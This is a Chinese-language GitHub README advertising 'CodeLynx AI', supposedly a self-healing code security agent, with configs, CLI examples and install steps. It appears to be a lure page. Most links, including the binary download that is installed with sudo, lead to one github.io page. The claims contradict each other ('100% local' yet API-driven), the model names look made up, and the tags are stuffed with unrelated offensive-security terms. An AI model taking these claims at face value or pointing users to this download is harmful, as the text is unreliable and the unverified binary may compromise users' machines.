wirdana888/claude-self-evolving-agent
GitHub: wirdana888/claude-self-evolving-agent
基于 Claude 和 OpenAI API 的自动化安全扫描与自愈式代码修复 Agent,在开发流水线中持续检测漏洞并生成补丁。
Stars: 0 | Forks: 0
# CodeLynx AI:自动化安全分析与自愈代码库 Agent
[](https://wirdana888.github.io/claude-self-evolving-agent/)
**面向现代开发流水线的自适应漏洞检测与自动化修复引擎**
[](https://opensource.org/licenses/MIT)
[](https://img.shields.io)
[](https://img.shields.io)
[](https://img.shields.io)
[](https://img.shields.io)
## 📖 执行摘要
CodeLynx AI 将您的代码库从一个静态仓库转变为一个拥有免疫反应的**活体系统**。与仅仅标记问题的传统 linter 不同,CodeLynx AI 扮演着**数字诊断专家**的角色——扫描、分析并自主对您的源代码进行精准的手术式修复。您可以将其视为软件的白细胞:不断巡逻、识别威胁,并在漏洞造成破坏之前将其修复。
在完成初始配置后,该插件由 Claude AI 和 OpenAI API 驱动,实现**零人工干预**运行,在您的开发工作流后台运行,确保您的代码始终保持纯净、安全和高效。
## 🚀 核心功能
### 🔬 自主漏洞发现(Zero-Day 检测)
- **主动扫描**可在潜在安全漏洞演变为真正威胁之前将其识别
- **模式匹配**支持包括 OWASP Top 10、CWE 和 NIST 标准在内的 40 多种 linter 规则集
- **启发式分析**可随着时间学习您代码库的独特模式
### 🏥 自愈式代码修复
- 自动为检测到的漏洞生成**离散、无破坏性的补丁**
- 为每次更改维护**回滚日志**——只需一条命令即可还原
- **上下文感知修复生成**,尊重您的编码规范和架构
### 🖥️ 实时运营仪表板
- 提供关于代码健康度、漏洞密度和修复成功率的实时遥测数据
- **颜色编码热力图**,显示哪些模块需要立即关注
- 可导出符合 SOC 2、HIPAA 和 PCI-DSS 审计要求的合规报告
### 🌍 多语言代码库支持
- 内置对 **47 种编程语言**的解析,包括 COBOL、Fortran 和 Racket 等小众语言
- **与语言无关的**分析引擎,具备针对不同语言的优化配置
- 自动翻译跨语言的注释和文档
### 🧠 持续自学习机制
- **反馈循环**可随着时间推移提高检测准确性
- 从开发人员提供的确认和纠正中学习
- 通过定期的模型更新适应新的攻击向量
## 📊 系统架构
```
graph TD
A[Git Commit / Push] --> B[CodeLynx AI Agent]
B --> C{Analysis Engine}
C --> D[Syntax Checker]
C --> E[Security Scanner]
C --> F[Performance Analyzer]
C --> G[Style Validator]
D --> H[Linter Pool 40+]
E --> I[OWASP Ruleset]
F --> J[Complexity Metric]
G --> K[Convention Check]
H --> L[Vulnerability Aggregator]
I --> L
J --> L
K --> L
L --> M{Severity Assessment}
M --> N[Low Risk]
M --> O[Medium Risk]
M --> P[High Risk]
M --> Q[Critical Risk]
N --> R[Log Only]
O --> S[Suggest Fix]
P --> T[Auto-Fix with Review]
Q --> U[Immediate Auto-Fix + Notification]
R --> V[Dashboard Update]
S --> V
T --> V
U --> V
V --> W[Git Rollback Journal]
W --> X[User Confirmation]
```
## 💡 示例 Profile 配置
在您的项目根目录中创建一个 `codelynx.profile.json` 文件,以自定义检测阈值和自动修复行为:
```
{
"agent_name": "CodeLynx-Alpha",
"ai_providers": {
"claude": {
"model": "claude-3-opus-2026",
"temperature": 0.1,
"max_tokens": 4096
},
"openai": {
"model": "gpt-4-turbo-2026",
"temperature": 0.15,
"max_tokens": 4096
}
},
"severity_thresholds": {
"critical_auto_fix": true,
"high_auto_fix": false,
"medium_suggest": true,
"low_log": true
},
"languages": ["python", "javascript", "go", "rust", "typescript"],
"exclude_paths": ["node_modules/", "vendor/", "dist/"],
"compliance_mode": "SOC2",
"rollback_limit": 50,
"dashboard_port": 9123,
"email_alerts": {
"enabled": false,
"recipients": [],
"min_severity": "high"
}
}
```
## 🖥️ 示例控制台调用
安装完成后,您可以直接从终端调用 CodeLynx AI:
```
# 在当前目录上运行完整扫描
codelynx scan --path ./src --profile custom.json
# 监控目录的实时变更(daemon 模式)
codelynx watch --directory /workspace/my-project --background
# 为审计人员生成 compliance 报告
codelynx report --type soc2 --output ./reports/compliance-2026-q1.pdf
# 回滚最后 5 个 auto-fix
codelynx rollback --steps 5 --verbose
# 查看 dashboard(在 browser 中打开)
codelynx dashboard --open
```
## 🖥️ 操作系统兼容性
| 操作系统 | 版本 | 2026 年支持 | 状态 |
|:--|:--------|:------------|:-------|
| **Linux** | Ubuntu 22.04+ | ✅ 全面 | 原生性能 |
| **Linux** | Debian 12 | ✅ 全面 | 优化的二进制文件 |
| **Linux** | Fedora 38+ | ✅ 全面 | 提供 RPM 包 |
| **Linux** | Arch Linux | ✅ 社区 | AUR 包 |
| **macOS** | Ventura+ | ✅ 全面 | Apple Silicon 原生 |
| **macOS** | Monterey | ✅ 部分 | Intel x86_64 |
| **Windows** | 11 (23H2+) | ✅ 全面 | 推荐 WSL2 |
| **Windows** | 10 (22H2) | ✅ 部分 | 原生可执行文件 |
| **FreeBSD** | 14+ | ⚠️ Beta | 功能受限 |
| **Alpine** | 3.18+ | ✅ 全面 | Docker 优化 |
## 🛠️ 功能清单
| 功能 | 描述 | 状态 |
|:--------|:------------|:-------|
| **零配置设置** | 即插即用,具备合理的默认值 | ✅ |
| **40+ Linter 集成** | ESLint、PyLint、GoLint、RustClippy 等 | ✅ |
| **OWASP 安全扫描** | Top 10、API 安全、移动端 | ✅ |
| **CodeRabbit PR 审查** | 自动化 pull request 评论 | ✅ |
| **实时仪表板** | 基于 Web 的实时遥测 | ✅ |
| **本地处理** | 100% 离线,数据永不离开您的机器 | ✅ |
| **CI/CD 流水线集成** | GitHub Actions、GitLab CI、Jenkins | ✅ |
| **Slack 和 Telegram 通知** | 实时警报 | ✅ |
| **自动回滚日志** | 撤销任何自动化更改 | ✅ |
| **多语言支持** | 47 种编程语言 | ✅ |
| **响应式 UI** | 适用于移动设备、平板电脑、桌面端 | ✅ |
| **24/7 客户支持** | 专属电子邮件和聊天(企业版) | ✅ |
| **自定义规则创建** | 编写您自己的 linting 规则 | ✅ |
| **企业 SSO** | Okta、Azure AD、OneLogin | 🔜 2026 年第三季度 |
| **GPT-4 Vision 分析** | 基于截图的代码审查 | 🔜 2026 年第四季度 |
## 🔌 API 集成
### Claude API (Anthropic)
CodeLynx AI 利用 **Claude 3 Opus** 模型进行高级推理、漏洞分类,并以自然语言解释复杂的安全问题。设置 `ANTHROPIC_API_KEY` 环境变量后,集成即会自动完成。
```
export ANTHROPIC_API_KEY="sk-ant-xxxxxxxxxxxx"
```
Claude 负责:
- 需要多步推理的**复杂漏洞分析**
- 维护架构完整性的**上下文感知补丁生成**
- 用于代码审查评论的**自然语言摘要**
- 通过语义理解**减少误报**
### OpenAI API (GPT-4 Turbo)
对于**速度优化的任务**和批量处理,CodeLynx AI 使用 **GPT-4 Turbo** 模型。通过环境变量设置您的密钥:
```
export OPENAI_API_KEY="sk-xxxxxxxxxxxx"
```
OpenAI 负责:
- 跨 47 种语言的**快速语法验证**
- 识别热点代码路径中的**性能瓶颈**
- 结合可配置 profile 进行**风格和规范强制检查**
- **实时仪表板数据解析**和指标计算
## 📥 下载与安装
[](https://wirdana888.github.io/claude-self-evolving-agent/)
### 快速安装(包管理器)
**macOS (Homebrew):**
```
brew tap codelynx/tap
brew install codelynx
```
**Linux (Apt):**
```
echo "deb https://codelynx.ai/apt stable main" | sudo tee /etc/apt/sources.list.d/codelynx.list
sudo apt update && sudo apt install codelynx
```
**Windows (Chocolatey):**
```
choco install codelynx
```
### Docker(全平台)
```
docker pull codelynx/agent:2026
docker run -d --name codelynx-agent \
-v $(pwd):/workspace \
-e ANTHROPIC_API_KEY="sk-ant-xxxx" \
-e OPENAI_API_KEY="sk-xxxx" \
-p 9123:9123 \
codelynx/agent:2026
```
### 二进制下载
从 https://wirdana888.github.io/claude-self-evolving-agent/ 页面下载适用于您平台的最新版本。解压并运行:
```
tar -xzf codelynx-2026-linux-x64.tar.gz
sudo mv codelynx /usr/local/bin/
codelynx init
```
## ⚙️ 配置与自定义
CodeLynx AI 支持通过环境变量、YAML 文件或交互式仪表板进行广泛配置。创建一个 `codelynx.yml` 文件:
```
agent:
name: "Nightwatch"
auto_update: true
update_channel: stable
analysis:
depth: full
scan_on_commit: true
exclude_patterns:
- "*.generated.*"
- "vendor/**"
notifications:
channels:
- type: slack
webhook: https://hooks.slack.com/services/xxx
min_severity: medium
- type: email
smtp_server: smtp.gmail.com
recipients:
- security@example.com
```
## 📄 许可证
本项目基于 **MIT 许可证**授权 - 详情请参阅 [LICENSE](https://opensource.org/licenses/MIT) 文件。
特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人,允许其无限制地处理本软件,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售本软件副本的权利。
## ⚠️ 免责声明
CodeLynx AI 是一款**开发人员工具**,旨在辅助提升代码质量和安全性。尽管该 agent 努力保证准确性,但不应将其视为以下内容的替代品:
- 由认证专业人员进行的**手动安全审计**
- 关键系统组件的**形式化验证**
- 架构决策中的**人工判断**
CodeLynx AI 的开发人员对因自动化代码修改引起的损害**不承担任何责任**。在部署到生产环境之前,请务必审查关键更改。对于**高**和**中**严重级别的项目,自动修复功能默认处于禁用状态。
使用本软件即表示您承认:
1. 所有自动修改均应由人类开发人员审查
2. CodeLynx AI 不保证 100% 的漏洞覆盖率
3. 该工具的输出仅供参考,而非强制指令
4. 回滚功能可能无法覆盖所有场景
## ❓ 常见问题
**问:CodeLynx AI 会将我的代码发送到外部服务器吗?**
答:不会。所有处理均在您的机器上**100% 本地**完成。API 密钥仅用于模型推理,源代码永远不会离开您的环境。
**问:我可以在没有互联网连接的情况下使用 CodeLynx AI 吗?**
答:可以,但有限制。核心分析引擎可离线工作——只有 AI 驱动的功能需要 API 连接。
**问:该 agent 多久更新一次其检测规则?**
答:规则更新通过更新通道**每周**进行。严重漏洞会在 24 小时内修补。
**问:CodeLynx AI 兼容 monorepo 吗?**
答:绝对兼容。该 agent 可识别 monorepo 结构,并使用适当的语言设置独立扫描每个 package。
## 📞 支持
- **文档:**[codelynx.dev/docs](https://wirdana888.github.io/claude-self-evolving-agent/)
- **社区论坛:**[discuss.codelynx.dev](https://wirdana888.github.io/claude-self-evolving-agent/)
- **企业支持:**support@codelynx.dev(付费计划 24/7 支持)
- **状态页面:**[status.codelynx.dev](https://wirdana888.github.io/claude-self-evolving-agent/)
[](https://wirdana888.github.io/claude-self-evolving-agent/)
*CodeLynx AI 版本 1.0.0 | 为 2026 年的开发环境打造 | "您的代码,自我防御。"*
标签:CISA项目, DevSecOps, DNS 反向解析, Go语言工具, LLM Agent, LNA, Petitpotam, Python, Web报告查看器, 上游代理, 人工智能, 后端开发, 无后门, 用户模式Hook绕过, 自动修复, 请求拦截, 逆向工具, 静态应用安全测试